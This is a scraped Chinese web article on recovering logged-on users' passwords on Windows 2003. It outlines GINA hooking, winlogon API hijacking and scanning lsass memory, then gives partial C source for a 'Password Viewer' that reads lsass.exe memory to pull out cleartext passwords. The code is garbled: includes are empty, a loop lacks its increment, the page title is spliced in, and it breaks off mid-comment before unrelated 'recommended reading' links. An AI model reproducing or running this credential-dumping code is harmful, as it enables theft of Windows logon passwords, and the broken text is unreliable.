2.程序模拟一个登陆(使用LogonUser()就能搞定) , 因为使用LogonUser()这个API , 你要提供帐号名和对应的正确的密码 , 才可以成功 , 然后你就可以去搜索lsass进程内存 。因为知道密码是什么 , 我们就能定位到密码是保存在什么地方 。因为登陆用户的密码都是保存在同一个地址或相离不远的地址中 , 模拟登陆和搜索 , 可以先定位以后登陆的用户的密码会大约保存在什么位置 。
无论怎说 , 三种方法中 , 最稳定 , 最安全的方法还是使用Gina那种方法.Hijack了winlogn一些API的方法 , 毕竟是改动了系统的东西 , 对系统的稳定性来说 , 会有考验 , 直接搜索lsass进程内存的方法呢 , 虽说也是困难 , 但准确性 , 成功率却又是低 。
下面的代码使用的是很笨 , 而且很原始的搜索方法 , 主要是搜索Lsass内存中"LocalSystem Remote Procedure"这个字符串 , 因为在相当多的测试中 , 密码都是保存在有这个字符串的地址后一点的位置中 , 当然了 , 很多系统并没有这个字符串 , 或者就算有 , 我们得到的都是错误的密码 。
代码: //********************************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: 12/15/2004
// Purpose: To Demonstrate Searching Logon User PassWord On 2003 Box , The Method
// Used Is Pretty Unwise , But This May Be The Only Way To RevIEw The
// Logon User"s Password On Windows 2003.
// Test PlatForm: Windows 2003
// Compiled On: VC6.0
//********************************************************************************
#include
#include
#include
#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address , Which Causes The Result Unreliable
【如何在Windows 2003中得到登陆密码】char Password[MAX_PATH] = ; // Store The Found Password
// Function ProtoType Declaration
//------------------------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID);
int Search(char *Buffer , const UINT nSize);
DWORD GetLsassPID();
BOOL Is2003();
//------------------------------------------------------------------------------------------------------
// End Of Fucntion ProtoType Declaration
int main()
{
DWORD PID = 0;
printf("Windows 2003 Password Viewer V1.0 By WinEggDropnn");
if (!Is2003()) // Check Out If The Box Is 2003
{
printf("The Program Can"t Only Run On Windows 2003 Platformn");
return -1;
}
PID = GetLsassPID(); // Get The Lsass.exe PID
if (PID == 0) // Fail To Get PID If Returning Zerom
{
return -1;
}
FindPassword(PID); // Find The Password From Lsass.exe Memory
return 0;
}
// End main()
//------------------------------------------------------------------------------------
// Purpose: Search The Memory & Try To Get The Password
// Return Type: int
// Parameters:
// In: char *Buffer --> The Memory Buffer To Search
// Out: const UINT nSize --> The Size Of The Memory Buffer
// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure" ,
// Since The Password Is Near The Above Location , But It"s Not Always True That
// We Will Find The Magic String , Or Even We Find It , The Password May Be Located
// At Some Other Place.We Only Look For Luck
//------------------------------------------------------------------------------------
int Search(char *Buffer , const UINT nSize)
{
UINT OffSet = 0;
UINT i = 0;
UINT j = 0 ;
UINT Count = 0;
if (Buffer == NULL)
{
return -1;
}
for (i = 0 ; i < nSize ; i)
{
/* The Below Is To Find The Magic String , Why So Complicated?That Will Thank MS.The Separation From Word To Word
推荐阅读
- 清除故障,让Windows 2003系统更加亲切
- 弓形虫病是如何传播的
- 极速狂飚 Windows 2003系统25招加速大法
- 在Windows 2003中实现网络共享还原
- Windows 2003中重置TCP/IP
- 如何让猫不乱撒尿
- Windows 2003常见故障解决方法
- 男方离婚如何不给抚养费
- 公司倒闭裁员如何补偿
- 如何改名字